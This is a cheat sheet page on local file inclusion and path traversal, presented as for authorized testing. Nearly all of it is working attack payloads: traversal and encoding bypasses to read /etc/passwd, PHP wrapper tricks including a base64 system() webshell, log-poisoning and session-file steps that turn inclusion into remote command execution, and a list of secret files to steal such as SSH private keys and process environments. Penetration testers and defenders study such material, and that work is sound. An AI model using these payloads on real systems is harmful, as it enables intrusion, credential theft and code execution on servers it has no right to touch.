CyberCheatsheets

LFI / Path Traversal Cheat Sheet

Local file inclusion and directory traversal payloads, PHP wrappers, and log-poisoning RCE for authorized testing.

Web Application Securitylfiowasppath-traversalrfiwebUpdated 2026-06-17

Overview

Local File Inclusion (LFI) and path traversal occur when an app builds a file path from user input without sanitization, letting you read files outside the intended directory—or, with PHP, escalate to code execution via wrappers and log poisoning. Test any parameter that looks like a filename, page, template, or language.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Basic traversal

Linux — climb out and read passwd

../../../../etc/passwd

Windows equivalent

..\..\..\..\windows\win.ini

Absolute path (when the app prepends nothing)

/etc/passwd

Bypass naive single-pass ../ stripping

....//....//....//etc/passwd

Filter bypasses

URL-encode the slashes

..%2f..%2f..%2fetc%2fpasswd

Double URL-encode (decoded twice)

..%252f..%252f..%252fetc%252fpasswd

Null byte to truncate an appended extension (PHP < 5.3.4)

../../../etc/passwd%00

Mixed-slash variant

....\/....\/etc/passwd

PHP wrappers (read source)

Base64-encode source so PHP isn't executed — decode to read it

php://filter/convert.base64-encode/resource=index.php

ROT13 variant when base64 is filtered

php://filter/read=string.rot13/resource=config.php

data:// wrapper → RCE (decodes to a system() webshell)

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTs/Pg==

Requires allow_url_include=On.

Direct command execution if the expect extension is loaded

expect://id

LFI to RCE: log poisoning

1) Poison the access log via a malicious User-Agent

curl http://target/ -A '<?php system($_GET["c"]); ?>'

2) Include the poisoned log and run a command

http://target/?page=/var/log/apache2/access.log&c=id

Alternative: poison the SSH auth log via a crafted username

ssh '<?php system($_GET[0]); ?>'@target

Then include it

http://target/?page=/var/log/auth.log&0=id

PHP session & wrapper RCE

POST the PHP payload as the body (page=php://input)

php://input

Send <?php system('id'); ?> in the request body.

Include your own session file after injecting PHP into a session value

/var/lib/php/sessions/sess_<PHPSESSID>

High-value files to read

Linux users and (sometimes) service hints

/etc/passwd

App config / DB creds

/var/www/html/config.php  (read via php://filter base64)

SSH private key

/home/<user>/.ssh/id_rsa

Process environment (tokens, secrets)

/proc/self/environ

Current process cmdline

/proc/self/cmdline

Tips

  • Always try php://filter base64 first on .php targets — it reveals source (and creds) without executing.
  • /proc/self/environ and /proc/self/fd/* are great LFI-to-RCE and info-leak primitives.
  • Wordlists like LFI-Jhaddix.txt + ffuf automate finding the right traversal depth.
  • Fix = a strict allowlist of file names and basename() — never pass user input to include().

References

Aide-mémoires similaires